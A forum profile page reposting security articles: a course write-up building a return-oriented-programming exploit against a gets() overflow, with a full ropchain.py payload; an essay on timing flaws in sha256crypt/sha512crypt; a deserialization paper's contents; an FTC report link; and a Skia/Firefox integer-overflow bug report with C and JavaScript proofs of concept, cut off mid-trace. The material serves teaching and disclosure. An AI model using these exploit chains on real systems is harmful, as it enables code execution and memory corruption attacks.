-
Posts
18753 -
Joined
-
Last visited
-
Days Won
726
Everything posted by Nytro
-
ropchain I’m going to show you how to do Project 1 Question 1 while ASLR+DEP+stack canaries are enabled. As a reminder, here’s how the code looks: void deja_vu() { char door[8]; gets(door); } int main() { deja_vu(); } A Chinese translation of this article is available here. ASLR and DEP We will start by defeating ASLR and DEP. The text segment of our dejavu binary will not be randomized, since it is not a position-independent executable. This means we can get around both defenses with a return oriented programming chain. Our solution is broken up into many different steps: Put the address of the system function from libc onto the stack. Put the address of the string "s/kernel/rtsig-max" onto the stack (but possibly far from system). Align the stack pointer to point to "s/kernel/rtsig-max". Align edx to point to &system. Call [edx]. This is equivalent to system("s/kernel/rtsig-max"), which executes an attacker-controlled binary with setuid privileges. The string "s/kernel/rtsig-max" is mostly arbitrary, any string contained in libc which can be treated as a relative Linux path and ends whose address ends in a NUL byte is a valid target. It’s possible to get the string "/bin/sh" on the stack instead, but that makes our attack more complicated. Return Oriented Programming Primer The idea behind return oriented programming is that you place the addresses of “gadgets” onto the stack. These gadgets do some (usually small) operation, and then call ret. Once we ret, that pops the address of the next gadget off the stack and jumps to that address. Our goal is to chain these small gadgets together in order to achieve arbitrary code execution. Effectively, we can think of ROP as letting us jump to any series of addresses we want, as long as the calls doesn’t mess up our stack. Usual suspects for messing up the stack is a leave or anything which changes esp by a lot. There are tools to help find gadgets within executables. This is useful, because sometimes gadgets can even be hidden inside other instructions! Let’s run ROPgadget to see what sort of gadgets we have. $ python ROPgadget.py --binary ../dejavu --badbytes 0a # ... Unique gadgets found: 86 We set a “bad byte” of 0x0a since we know that our gets function cannot write a newline. (It can write NUL bytes.) While we have a bunch of gadgets, most of them suck. Here are the few that we plan to use: 0x0804841c : dec ecx ; ret 0x0804835e : add dh, bl ; ret 0x0804857b : call dword ptr [edx] 0x080482d2 : pop ebx ; ret 0x080482bb : ret Note that the last of these gadgets is effectively a return oriented programming NOP: it just moves the esp up 4 bytes to access the next return address. We’ll see later why it is useful. The Attack We will need to reference the disassembly quite often. Here is the disassembly of the dejavu program, excluding libc parts. deja_vu: 0x0804840c <+0>: push ebp 0x0804840d <+1>: mov ebp,esp 0x0804840f <+3>: sub esp,0x28 0x08048412 <+6>: lea eax,[ebp-0x10] 0x08048415 <+9>: mov DWORD PTR [esp],eax 0x08048418 <+12>: call 0x80482f0 <gets@plt> 0x0804841d <+17>: leave 0x0804841e <+18>: ret main: 0x0804841f <+0>: push ebp 0x08048420 <+1>: mov ebp,esp 0x08048422 <+3>: and esp,0xfffffff0 0x08048425 <+6>: call 0x804840c <deja_vu> 0x0804842a <+11>: mov eax,0x0 0x0804842f <+16>: leave 0x08048430 <+17>: ret Let’s take a look at the stack layout at deja_vu+18 (right before we ret from the function). It looks something like this: /---------------------\ | . . . | | saved return addr. | <--- esp | . . . | | door | <--- eax, edx | . . . | | . . . | | . . . | | libc_end | <--- ecx | . . . | | system | <--- we want this | . . . | | libc_start | <--- ebx | . . . | | . . . | | . . . | | dejavu .text | \---------------------/ Even though libc’s position in code is randomized, ebx and ecx effectively “leak” information about its location. This is a result of the dynamic loader resolving the call to gets@plt. How this occurs is a little complicated, so let’s take it for granted. While the address of libc is randomized by ASLR, the offset of things within libc is not. For example, the system function is always at 0x168494 bytes before libc_end. We want to call this function, so we need to decrease ecx by 0x168494. How can we decrease ecx? We do have a promising gadget which decrements ecx by 1: 0x0804841c : dec ecx ; ret We would need to call this gadget 0x168494 times to get the address of system. (There are no other useful gadgets for either ecx or ebx.) Our available stack space is an order of magnitude less. However, we can use the following trick: we return to main. Because gcc aligns the stack at 16 bytes intervals, we will gain stack space every time we call main. The picture below illustrates the scenario right before main+3 executes: /---------------------\ | . . . | | 4 bytes | <--- old esp | sfp | <--- esp, ebp | 4 bytes | | 4 bytes | | 4 bytes | <--- esp & 0xfffffff0 | . . . | \---------------------/ After we call main, our program continues to call deja_vu. This gives us another opportunity to do a buffer overflow to gain more stack space. By repeating this method a bunch of times, we can get enough stack space to do 0x168494 decrements. We need to perform all the decrements at once since our value for ecx gets overwritten every time gets is called. We perform the same method in order to get the address of "s/kernel/rtsig-max" onto the stack. Once we have ecx pointing to system, we now need to call the address. There is a call gadget call dword ptr [edx]. So we need some way to get the address of the value of ecx into edx. The only place where we have the opportunity to put ecx on the stack is a push ecx in _start. The _start function is called by the operating system before main and effectively loads libc which then begins the main program. _start: 0x08048320 <+0>: xor ebp,ebp 0x08048322 <+2>: pop esi 0x08048323 <+3>: mov ecx,esp 0x08048325 <+5>: and esp,0xfffffff0 0x08048328 <+8>: push eax 0x08048329 <+9>: push esp 0x0804832a <+10>: push edx 0x0804832b <+11>: push 0x80484b0 0x08048330 <+16>: push 0x8048440 0x08048335 <+21>: push ecx 0x08048336 <+22>: push esi 0x08048337 <+23>: push 0x804841f 0x0804833c <+28>: call 0x8048310 <__libc_start_main@plt> 0x08048341 <+33>: hlt In order to have the program run correctly and to push ecx on the stack, we need to jump to _start+9. We could actually jump to anywhere between _start+5 and _start+11, but this will mess up our stack alignment later on. Recall that the return value of gets is stored in edx. We can use some arithmetic in order to get that edx to point one of the system calls. We do have a gadget which involves arithmetic using edx and ebx: 0x0804835e : add dh, bl ; ret If you need a reminder of how x86 registers work, look at the following diagram. /------------------------\ | edx | | | dx | | | dh | dl | \------------------------/ The register edx refers to the whole 32-bit register. The register dx refers to the lower 16-bits of the register. dh and dl refer to the two 8-bit halves of the lower 16-bits. So this gadget lets us change the middle bits of edx however we want. Note we can’t “overflow” dh into the top half of the register, so we cannot actually affect the top bits of edx. There is also a gadget letting us pop into ebx, so we completely control bl. We can load any value we want into ebx by putting it on the stack and then letting it get popped into the register. However this only lets us affect the second least significant byte of edx. Since edx is also the address of the door buffer, we can also change door and also edx by changing our stack pointer. Therefore we can use the same stack trick of returning to main in order to align edx with the address of system. Now we need to align our stack pointer with our executable string so that we can use it as an argument to system. We simply use a ROP NOP (similar to a ret2ret chain): 0x080482bb : ret After a few NOPs, we have that our stack pointer is nearly at the right spot. We finish our ROP chain with the previously mentioned call dword ptr [edx]. gets also terminates this with a NUL byte, which overwrites the LSB of the executable string address. (This is why we chose a string whose LSB was already 0x00.) Now we are in a ret2libc scenario: we are calling system with a pointer to a string on the stack. This runs the program as uid brown, which allows us to do whatever we want. Stack Canaries Let’s say that we also add stack canaries. How much more difficult does this make our exploit? Debian systems always set the least significant byte of the canary to 0x00, and so we only have 24 bits of entropy. We stay with the constant guess of 0x41414100 as the stack canary, and simply keep running until we get that. An efficient C program using syscalls can get on the order of 2500 tries per second. Based on this, we can estimate that our program will take approximately 1.2 hours to crack the canary. Closing Thoughts The final ropchain is listed in ropchain.py below. The code can be modified to create the necessary directories and executable automatically, and to work when stack canaries are enabled. #!/usr/bin/env python2 # ropchain.py from struct import pack p = lambda n: pack("<I", n) sc = [] PAD = 'A' * 20 DEC_ECX = p(0x0804841c) RET_MAIN = p(0x0804841f) RET_START = p(0x08048320 + 9) POP_EBX = p(0x080482d2) ADD_DH_BL = p(0x0804835e) CALL_STAR_EDX = p(0x0804857b) ROP_NOP = p(0x080482bb) NEWLINE = '\n' GET_16B = PAD + RET_MAIN + NEWLINE OFFSET_BINARY = 0x450c4 OFFSET_SYSTEM = 0x168494 def load_libc_address(offset): sc.extend([GET_16B] * ((offset + 3) / 4)) sc.append(PAD) sc.extend([DEC_ECX] * offset) sc.append(RET_START) sc.append(NEWLINE) load_libc_address(OFFSET_SYSTEM) load_libc_address(OFFSET_BINARY) sc.extend([GET_16B] * 3) sc.append(PAD + POP_EBX + p(1)) sc.append(ADD_DH_BL) sc.extend([ROP_NOP] * 15) sc.append(CALL_STAR_EDX) sc.append(NEWLINE) print(''.join(sc)) Sursa: http://www.kvakil.me/posts/ropchain/
-
Do Not Use sha256crypt / sha512crypt - They're Dangerous Introduction I'd like to demonstrate why I think using sha256crypt or sha512crypt on current GNU/Linux operating systems is dangerous, and why I think the developers of GLIBC should move to scrypt or Argon2, or at least bcrypt or PBKDF2. History and md5crypt In 1994, Poul-Henning Kamp (PHK) added md5crypt to FreeBSD to address the weaknesses of DES-crypt that was common on the Unix and BSD systems of the early 1990s. DES-Crypt has a core flaw in that, not only DES reversible (which necessarily isn't a problem here), and incredibly fast, but it also limited password length to 8 characters (each of those limited to 7-bit ASCII to create a 56-bit DES key). When PHK created md5crypt, one of the things he made sure to implement as a feature was to support arbitrary-length passwords. In other words, unlike DES-Crypt, a user could have passwords greater than 9 or more characters. This was "good enough" for 1994, but it had an interesting feature that I don't think PHK thought of at the time- md5crypt execution time is dependent on password length. To prove this, I wrote a simple Python script using passlib to hash passwords with md5crypt. I started with a single "a" character as my password, then increased the password length by appending more "a"s up until the password was 4,096 "a"s total. 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 import time from passlib.hash import md5_crypt md5_results = [None] * 4096 for i in xrange(0, 4096): print i, pw = "a" * (i+1) start = time.clock() md5_crypt.hash(pw) end = time.clock() md5_results[i] = end - start with open("md5crypt.txt", "w") as f: for i in xrange(0, 4096): f.write("{0} {1}\n".format(i+1, md5_results[i])) Nothing fancy. Start the timer, hash one "a" with md5crypt, stop the timer, and record the results. Start the timer, hash two "a"s with md5crypt, stop the timer, and record the results. Wash, rinse, repeat, until the password is 4,096 "a"s in length. What do the timing results look like? Below are scatter plots of timing md5crypt for passwords of 1-128, 1-512, and 1-4,096 characters in length: md5crypt 1-128 characters md5crypt 1-512 characters md5crypt 1-4,096 characters At first, you wouldn't think this is a big deal; in fact, you may even think you LIKE it (we're supposed to make things get slower, right? That's a good thing, right???). But, upon deeper inspection, this actually is a flaw in the algorithm's design for two reasons: Long passwords can create a denial-of-service on the CPU (larger concern). Passive observation of execution times can predict password length (smaller concern). Now, to be fair, predicting password length based on execution time is ... meh. Let's be honest, the bulk of passwords will be between 7-10 characters. And because these algorithms operate in block sizes of 16, 32, or 64 bytes, an adversary learning "AHA! I know your password is between 1-16 characters" really isn't saying much. But, should this even exist in a cryptographic primitive? Probably not. Still, the larger concern would be users creating a DoS on the CPU, strictly by changing password length. I know what you're thinking- it's 2018, so there should be no reason why any practical length password cannot be adequately hashed with md5crypt insanely quickly, and you're right. Except, md5crypt was invented in 1994, 24 years ago. According to PHK, he designed it to take about 36 milliseconds on the hardware he was testing, which would mean a speed about 28 per second. So, it doesn't take much to see that by increasing the password's length, you can increase execution time enough to affect a busy authentication server. The question though, is why? Why is the execution time dependent on password length? This is because md5crypt processes the hash for every 16 bytes in the password. As a result, this creates the stepping behavior you see in the scatter plots above. A good password hashing design would not do this. PHK eventually sunset md5crypt in 2012 with CVE-2012-3287. Jeremi Gosney, a professional password cracker, demonstrated with Hashcat and 8 clustered Nvidia GTX 1080Ti GPUS, that a password cracker could rip through 128.4 million md5crypt guesses per second. You should no longer be implementing md5crypt for your password hashing. sha2crypt and NIH syndrome In 2007, Ulrich Drepper decided to improve things for GNU/Linux. He recognized the threat that GPU clusters, and even ASICs, posed on fast password cracking with md5crypt. One aspect of md5crypt was the hard-coded 1,000 iterations spent on the CPU, before the password hash was finalized. This cost was not configurable. Also, MD5 was already considered broken, with SHA-1 showing severe weaknesses, so he moved to SHA-2 for the core of his design. The first thing addressed, was to make the cost configurable, so as hardware improved, you could increase the iteration count, thus keeping the cost for calculating the final hash expensive for password crackers. However, he also made a couple core changes to his design that differed from md5crypt, which ended up having some rather drastic effects on its execution. Using code similar to above with Python's passlib, but rather using the sha256_crypt() and sha512_crypt() functions, we can create scatter plots of sha256crypt and sha512crypt for passwords up to 128-characters, 512-characters, and 4,096-characters total, just like we did weth md5crypt. How do they fall out? Take a look: sha256crypt 1-128 characters sha256crypt 1-512 characters sha256crypt 1-4,096 characters sha512crypt 1-128 characters sha512crypt 1-512 characters sha512crypt 1-4,096 characters Curious. Not only do we see the same increasing execution time based on password length, but unlike md5crypt, that growth is polynomial. The changes Ulrich Drepper made from md5crypt are subtle, but critical. Essentially, not only do we process the hash for every character in the password per round, like md5crypt, but we process every character in the password three more times. First, we take the binary representation of each bit in the password, and update the hash based on if we see a "1" or a "0". Second, for every character in the password, we update the hash. Finally, again, for every character in the password, we update the hash. For those familiar with big-O notation, we end up with an execution run time of O(pw_length2 + pw_length*iterations). Now, while it is true that we want our password hashing functions to be slow, we also want the iterative cost to be the driving factor in that decision, but that isn't the case with md5crypt, and it's not the case with sha256crypt nor sha512crypt. In all three cases, the password length is the driving factor in the execution time, not the iteration count. Again, why is this a problem? To remind you: Long passwords can create a denial-of-service on the CPU (larger concern). Passive observation of execution times can predict password length (smaller concern). Now, granted, in practice, people aren't carrying around 4 kilobyte passwords. If you are a web service provider, you probably don't want people uploading 5 gigabyte "passwords" to your service, creating a network denial of service. So you would probably be interested in creating an adequate password maximum, such as what NIST recommends at 128 characters, to prevent that from occurring. However, if you have an adequate iterative cost (such as say, 640,000 rounds), then even moderately large passwords from staff, where such limits may not be imposed, could create a CPU denial of service on busy authentication servers. As with md5crypt, we don't want this. Now, here's what I find odd about Ulrich Drepper, and his design. In his post, he says about his specification (emphasis mine): Well, there is a problem. I can already hear everybody complaining that I suffer from the NIH syndrome but this is not the reason. The same people who object to MD5 make their decisions on what to use also based on NIST guidelines. And Blowfish is not on the lists of the NIST. Therefore bcrypt() does not solve the problem. What is on the list is AES and the various SHA hash functions. Both are viable options. The AES variant can be based upon bcrypt(), the SHA variant could be based on the MD5 variant currently implemented. Since I had to solve the problem and I consider both solutions equally secure I went with the one which involves less code. The solution we use is based on SHA. More precisely, on SHA-256 and SHA-512. PBKDF2 was standardized as an IETF standard in September 2000, a full 7 years before Ulrich Drepper created his password hashing functions. While PBKDF2 as a whole would not be blessed by NIST until 3 years later, in December 2010 in SP 800-132, PBKDF2 can be based on functions that, as he mentioned, were already in the NIST standards. So, just like his special design that is based on SHA-2, PBKDF2 can be based on SHA-2. Where he said "I went with the one which involves less code", he should have gone with PBKDF2, as code had already long since existed in all sorts of cryptographic software, including OpenSSL. This seems to be a very clear case of NIH syndrome. Sure, I understand not wanting to go with bcrypt, as it's not part of the NIST standards . But don't roll your own crypto either, when algorithms already exist for this very purpose, that ARE based on designs that are part of NIST. So, how does PBKDF2-HMAC-SHA512 perform? Using similar Python code with the passlib password hashing library, it was trivial to put together: PBKDF2-HMAC-SHA512 1-128 characters PBKDF2-HMAC-SHA512 1-512 characters PBKDF2-HMAC-SHA512 1-4,096 characters What this clearly demonstrates, is that the only factor driving execution time, is the number of iterations you apply to the password, before delivering the final password hash. This is what you want to achieve, not giving the opportunity for a user to create a denial-of-service based on password length, nor an adversary learn the length of the user's password based on execution time. This is the sort of details that a cryptographer or cryptography expert would pay attention to, as opposed to an end-developer. It's worth pointing out that PBKDF2-HMAC-SHA512 is the default password hashing function for Mac OS X, with a variable cost between 30,000 and 50,000 iterations (typical PBKDF2 default is 1,000). OpenBSD, USENIX, and bcrypt Because Ulrich Drepper brought up bcrypt, it's worth mentioning in this post. First off, let's get something straight- bcrypt IS NOT Blowfish. While it's true that bcrypt is based on Blowfish, they are two completely different cryptographic primitives. bcrypt is a one-way cryptographic password hashing function, where as Blowfish is a two-way 64-bit block symmetric cipher. At the 1999 USENIX conference, Niels Provos and David Mazières, of OpenBSD, introduced bcrypt to the world. They were critical of md5crypt, stating the following (emphasis mine): MD5 crypt hashes the password and salt in a number of different combinations to slow down the evaluation speed. Some steps in the algorithm make it doubtful that the scheme was designed from a cryptographic point of view--for instance, the binary representation of the password length at some point determines which data is hashed, for every zero bit the first byte of the password and for every set bit the first byte of a previous hash computation. PHK was slightly offended by their off-handed remark that cryptography was not his core consideration when designing md5crypt. However, Niels Provos was a graduate student in the Computer Science PhD program at the University of Michigan at the time. By August 2003, he had earned his PhD. Since 1999, bcrypt has withstood the test of time, it has been considered "Best Practice" for hashing passwords, and is still well received today, even though better algorithms exist for hashing passwords. How does bcrypt compare to md5crypt, sha256crypt, and sha512crypt in execution time based on password length? bcrypt 1-128 characters bcrypt 1-512 characters bcrypt 1-4,096 characters Again, we see consistent execution, driven entirely by iteration cost, not by password length. Colin Percival, Tarsnap, and scrypt In May 2009, mathematician Dr. Colin Percival presented to BSDCan'09 about a new adaptive password hashing function called scrypt, that was not only CPU expensive, but RAM expensive as well. The motivation was that even though bcrypt and PBKDF2 are CPU-intensive, FPGAs or ASICs could be built to work through the password hashes much more quickly, due to not requiring much RAM, around 4 KB. By adding a memory cost, in addition to a CPU cost to the password hashing function, we can now require the FPGA and ASIC designers to onboard a specific amount of RAM, thus financially increasing the cost of production. scrypt recommends a default RAM cost of at least 16 MB. I like to think of these expensive functions as "security by obesity". scrypt was initially created as an expensive KDF for his backup service Tarsnap. Tarsnap generates client-side encryption keys, and encrypts your data on the client, before shipping the encrypted payload off to Tarsnap's servers. If at any event your client is lost or stolen, generating the encryption keys requires knowing the password that created them, and attempting to discover that password, just like typical password hashing functions, should be slow. It's now been 9 years as of this post, since Dr. Percival introduced scrypt to the world, and like bcrypt, it has withstood the test of time. It has received, and continues to receive extensive cryptanalysis, is not showing any critical flaws or weaknesses, and as such is among the top choices as a recommendation from security professionals for password hashing and key derivation. How does it fare with its execution time per password length? scrypt 1-128 characters scrypt 1-512 characters scrypt 1-4,096 characters I'm seeing a trend here. The Password Hashing Competition winner Argon2 In 2013, an open public competition, in the spirit of AES and SHA-3, was held to create a password hashing function that approached password security from what we knew with modern cryptography and password security. There were many interesting designs submitted, including a favorite of mine by Dr. Thomas Pornin of StackExchange fame and BearSSL, that used delegation to reduce the work load on the honest, while still making it expensive for the password cracker. In July 2015, the Argon2 algorithm was chosen as the winner of the competition. It comes with a clean approach of CPU and memory hardness, making the parameters easy to tweak, test, and benchmark. Even though the algorithm is relatively new, it has seen at least 5 years of analysis, as of this writing, and has quickly become the "Gold Standard" for password hashing. I fully recommend it for production use. Any bets on how it will execution times will be affected by password length? Let's look: Argon2 1-128 characters Argon2 1-512 characters Argon2 1-4,096 characters Execution time is not affected by password length. Imagine that. It's as if cryptographers know what they're doing when designing this stuff. Conclusion Ulrich Drepper tried creating something more secure than md5crypt, and ended up creating something worse. Don't use sha256crypt or sha512crypt; they're dangerous. For hashing passwords, in order of preference, use with an appropriate cost: Argon2 or scrypt (CPU and RAM hard) bcrypt or PBKDF2 (CPU hard only) Avoid practically everything else: md5crypt, sha256crypt, and sha512crypt Any generic cryptographic hashing function (MD5, SHA-1, SHA-2, SHA-3, BLAKE2, etc.) Any complex homebrew iterative design (10,000 iterations of salted SHA-256, etc.) Any encryption design (AES, Blowfish (ugh), ChaCha20, etc.) Acknowledgement Thanks to Steve Thomas (@Sc00bzT) for our discussions on Twitter for helping me see this quirky behavior with sha256crypt and sha512crypt. Posted by Aaron Toponce on Wednesday, May 23, 2018, at 6:56 am. Sursa: https://pthree.org/2018/05/23/do-not-use-sha256crypt-sha512crypt-theyre-dangerous/
-
Table of Contents Serialization (marshaling): ............................................................................................................................ 4 Deserialization (unmarshaling): .................................................................................................................... 4 Programming language support serialization: ............................................................................................... 4 Risk for using serialization: .......................................................................................................................... 5 Serialization in Java ...................................................................................................................................... 6 Deserialization vulnerability in Java: ............................................................................................................ 6 Code flow work........................................................................................................................................... 11 Vulnerability Detection: .............................................................................................................................. 12 CVE: ........................................................................................................................................................... 17 Tools: .......................................................................................................................................................... 17 Vulnerable libraries lead to RCE: ............................................................................................................... 18 Mitigation: .................................................................................................................................................. 19 Serialization in Python ................................................................................................................................ 20 Deserialization vulnerability in Python: ..................................................................................................... 21 Pickle instructions ....................................................................................................................................... 25 Exploit vulnerability: .................................................................................................................................. 26 CVE: ........................................................................................................................................................... 29 Mitigation: .................................................................................................................................................. 29 Serialization in PHP .................................................................................................................................... 30 Deserialization vulnerability in PHP: ......................................................................................................... 30 Exploit vulnerability: .................................................................................................................................. 35 CVE: ........................................................................................................................................................... 39 Mitigation: .................................................................................................................................................. 40 Serialization in Ruby ................................................................................................................................... 41 Deserialization vulnerability in Ruby: ........................................................................................................ 42 Detect and exploit vulnerability: ................................................................................................................ 44 CVE: ........................................................................................................................................................... 53 Tools: .......................................................................................................................................................... 53 Mitigation: .................................................................................................................................................. 53 Conclusion: ................................................................................................................................................. 56 Download: https://www.exploit-db.com/docs/english/44756-deserialization-vulnerability.pdf?rss
-
- 1
-
-
Mobile Security Updates: Understanding the Issues A Commission Report February 2018 FEDERAL TRADE COMMISSION Maureen K. Ohlhausen, Acting Chairman Terrell McSweeny, Commissioner Download: https://www.ftc.gov/system/files/documents/reports/mobile-security-updates-understanding-issues/mobile_security_updates_understanding_the_issues_publication_final.pdf
-
Skia and Firefox: Integer overflow in SkTDArray leading to out-of-bounds write Project Member Reported by ifratric@google.com, Feb 28 Back to list Issue description Skia bug report: https://bugs.chromium.org/p/skia/issues/detail?id=7674 Mozilla bug report: https://bugzilla.mozilla.org/show_bug.cgi?id=1441941 In Skia, SkTDArray stores length (fCount) and capacity (fReserve) as 32-bit ints and does not perform any integer overflow checks. There are a couple of places where an integer overflow could occur: (1) https://cs.chromium.org/chromium/src/third_party/skia/include/private/SkTDArray.h?rcl=a93a14a99816d25b773f0b12868143702baf44bf&l=369 (2) https://cs.chromium.org/chromium/src/third_party/skia/include/private/SkTDArray.h?rcl=a93a14a99816d25b773f0b12868143702baf44bf&l=382 (3) https://cs.chromium.org/chromium/src/third_party/skia/include/private/SkTDArray.h?rcl=a93a14a99816d25b773f0b12868143702baf44bf&l=383 and possibly others In addition, on 32-bit systems, multiplication integer overflows could occur in several places where expressions such as fReserve * sizeof(T) sizeof(T) * count etc. are used. An integer overflow in (2) above is especially dangerous as it will cause too little memory to be allocated to hold the array which will cause a out-of-bounds write when e.g. appending an element. I have successfully demonstrated the issue by causing an overflow in fPts array in SkPathMeasure (https://cs.chromium.org/chromium/src/third_party/skia/include/core/SkPathMeasure.h?l=104&rcl=23d97760248300b7aec213a36f8b0485857240b5) which is used when rendering dashed paths. The PoC requires a lot of memory (My estimate is 16+1 GB for storing the path, additional 16GB for the SkTDArray we are corrupting), however there might be less demanding paths for triggering SkTDArray integer overflows. PoC program for Skia ================================================================= #include <stdio.h> #include "SkCanvas.h" #include "SkPath.h" #include "SkGradientShader.h" #include "SkBitmap.h" #include "SkDashPathEffect.h" int main (int argc, char * const argv[]) { SkBitmap bitmap; bitmap.allocN32Pixels(500, 500); //Create Canvas SkCanvas canvas(bitmap); SkPaint p; p.setAntiAlias(false); float intervals[] = { 0, 10e9f }; p.setStyle(SkPaint::kStroke_Style); p.setPathEffect(SkDashPathEffect::Make(intervals, SK_ARRAY_COUNT(intervals), 0)); SkPath path; unsigned quadraticarr[] = {13, 68, 258, 1053, 1323, 2608, 10018, 15668, 59838, 557493, 696873, 871098, 4153813, 15845608, 48357008, 118059138, 288230353, 360287948, 562949933, 703687423, 1099511613, 0}; path.moveTo(0, 0); unsigned numpoints = 1; unsigned i = 1; unsigned qaindex = 0; while(numpoints < 2147483647) { if(numpoints == quadraticarr[qaindex]) { path.quadTo(i, 0, i, 0); qaindex++; numpoints += 2; } else { path.lineTo(i, 0); numpoints += 1; } i++; if(i == 1000000) { path.moveTo(0, 0); numpoints += 1; i = 1; } } printf("done building path\n"); canvas.drawPath(path, p); return 0; } ================================================================= ASan output: ASAN:DEADLYSIGNAL ================================================================= ==39779==ERROR: AddressSanitizer: SEGV on unknown address 0x7fefc321c7d8 (pc 0x7ff2dac9cf66 bp 0x7ffcb5a46540 sp 0x7ffcb5a45cc8 T0) #0 0x7ff2dac9cf65 (/lib/x86_64-linux-gnu/libc.so.6+0x83f65) #1 0x7bb66c in __asan_memcpy (/usr/local/google/home/ifratric/p0/skia/skia/out/asan/SkiaSDLExample+0x7bb66c) #2 0xcb2a33 in SkTDArray<SkPoint>::append(int, SkPoint const*) /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../include/private/../private/SkTDArray.h:184:17 #3 0xcb8b9a in SkPathMeasure::buildSegments() /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkPathMeasure.cpp:341:21 #4 0xcbb5f4 in SkPathMeasure::getLength() /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkPathMeasure.cpp:513:9 #5 0xcbb5f4 in SkPathMeasure::nextContour() /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkPathMeasure.cpp:688 #6 0x1805c14 in SkDashPath::InternalFilter(SkPath*, SkPath const&, SkStrokeRec*, SkRect const*, float const*, int, float, int, float, SkDashPath::StrokeRecApplication) /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/utils/SkDashPath.cpp:482:14 #7 0xe9cf60 in SkDashImpl::filterPath(SkPath*, SkPath const&, SkStrokeRec*, SkRect const*) const /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/effects/SkDashPathEffect.cpp:40:12 #8 0xc8fbef in SkPaint::getFillPath(SkPath const&, SkPath*, SkRect const*, float) const /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkPaint.cpp:1500:24 #9 0xbdbc26 in SkDraw::drawPath(SkPath const&, SkPaint const&, SkMatrix const*, bool, bool, SkBlitter*, SkInitOnceData*) const /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkDraw.cpp:1120:18 #10 0x169b16e in SkDraw::drawPath(SkPath const&, SkPaint const&, SkMatrix const*, bool) const /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkDraw.h:58:9 #11 0x169b16e in SkBitmapDevice::drawPath(SkPath const&, SkPaint const&, SkMatrix const*, bool) /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkBitmapDevice.cpp:226 #12 0xb748d1 in SkCanvas::onDrawPath(SkPath const&, SkPaint const&) /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkCanvas.cpp:2167:9 #13 0xb6b01a in SkCanvas::drawPath(SkPath const&, SkPaint const&) /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkCanvas.cpp:1757:5 #14 0x8031dc in main /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../example/SkiaSDLExample.cpp:49:5 #15 0x7ff2dac392b0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202b0) #16 0x733519 in _start (/usr/local/google/home/ifratric/p0/skia/skia/out/asan/SkiaSDLExample+0x733519) The issue can also be triggered via the web in Mozilla Firefox PoC for Mozilla Firefox on Linux (I used Firefox ASan build from https://developer.mozilla.org/en-US/docs/Mozilla/Testing/Firefox_and_Address_Sanitizer) ================================================================= <canvas id="canvas" width="64" height="64"></canvas> <br> <button onclick="go()">go</button> <script> var canvas = document.getElementById("canvas"); var ctx = canvas.getContext("2d"); function go() { ctx.beginPath(); ctx.mozImageSmoothingEnabled = false; ctx.webkitImageSmoothingEnabled = false; ctx.msImageSmoothingEnabled = false; ctx.imageSmoothingEnabled = false; linedasharr = [0, 1e+37]; ctx.setLineDash(linedasharr); quadraticarr = [13, 68, 258, 1053, 1323, 2608, 10018, 15668, 59838, 557493, 696873, 871098, 4153813, 15845608, 48357008, 118059138, 288230353, 360287948, 562949933, 703687423, 1099511613]; ctx.moveTo(0, 0); numpoints = 1; i = 1; qaindex = 0; while(numpoints < 2147483647) { if(numpoints == quadraticarr[qaindex]) { ctx.quadraticCurveTo(i, 0, i, 0); qaindex++; numpoints += 2; } else { ctx.lineTo(i, 0); numpoints += 1; } i++; if(i == 1000000) { ctx.moveTo(0, 0); numpoints += 1; i = 1; } } alert("done building path"); ctx.stroke(); alert("exploit failed"); } </script> ================================================================= ASan output: AddressSanitizer:DEADLYSIGNAL ================================================================= ==37732==ERROR: AddressSanitizer: SEGV on unknown address 0x7ff86d20e7d8 (pc 0x7ff7c1233701 bp 0x7fffd19dd5f0 sp 0x7fffd19dd420 T0) ==37732==The signal is caused by a WRITE memory access. #0 0x7ff7c1233700 in append /builds/worker/workspace/build/src/gfx/skia/skia/include/core/../private/SkTDArray.h:184:17 #1 0x7ff7c1233700 in SkPathMeasure::buildSegments() /builds/worker/workspace/build/src/gfx/skia/skia/src/core/SkPathMeasure.cpp:342 #2 0x7ff7c1235be1 in getLength /builds/worker/workspace/build/src/gfx/skia/skia/src/core/SkPathMeasure.cpp:516:15 #3 0x7ff7c1235be1 in SkPathMeasure::nextContour() /builds/worker/workspace/build/src/gfx/skia/skia/src/core/SkPathMeasure.cpp:688 #4 0x7ff7c112905e in SkDashPath::InternalFilter(SkPath*, SkPath const&, SkStrokeRec*, SkRect const*, float const*, int, float, int, float, SkDashPath::StrokeRecApplication) /builds/worker/workspace/build/src/gfx/skia/skia/src/utils/SkDashPath.cpp:307:19 #5 0x7ff7c0bf9ed0 in SkDashPathEffect::filterPath(SkPath*, SkPath const&, SkStrokeRec*, SkRect const*) const /builds/worker/workspace/build/src/gfx/skia/skia/src/effects/SkDashPathEffect.cpp:40:12 #6 0x7ff7c1210ed6 in SkPaint::getFillPath(SkPath const&, SkPath*, SkRect const*, float) const /builds/worker/workspace/build/src/gfx/skia/skia/src/core/SkPaint.cpp:1969:37 #7 0x7ff7c0ec9156 in SkDraw::drawPath(SkPath const&, SkPaint const&, SkMatrix const*, bool, bool, SkBlitter*) const /builds/worker/workspace/build/src/gfx/skia/skia/src/core/SkDraw.cpp:1141:25 #8 0x7ff7c0b8de4b in drawPath /builds/worker/workspace/build/src/gfx/skia/skia/src/core/SkDraw.h:55:15 #9 0x7ff7c0b8de4b in SkBitmapDevice::drawPath(SkPath const&, SkPaint const&, SkMatrix const*, bool) /builds/worker/workspace/build/src/gfx/skia/skia/src/core/SkBitmapDevice.cpp:235 #10 0x7ff7c0bbc691 in SkCanvas::onDrawPath(SkPath const&, SkPaint const&) /builds/worker/workspace/build/src/gfx/skia/skia/src/core/SkCanvas.cpp:2227:23 #11 0x7ff7b86965b4 in 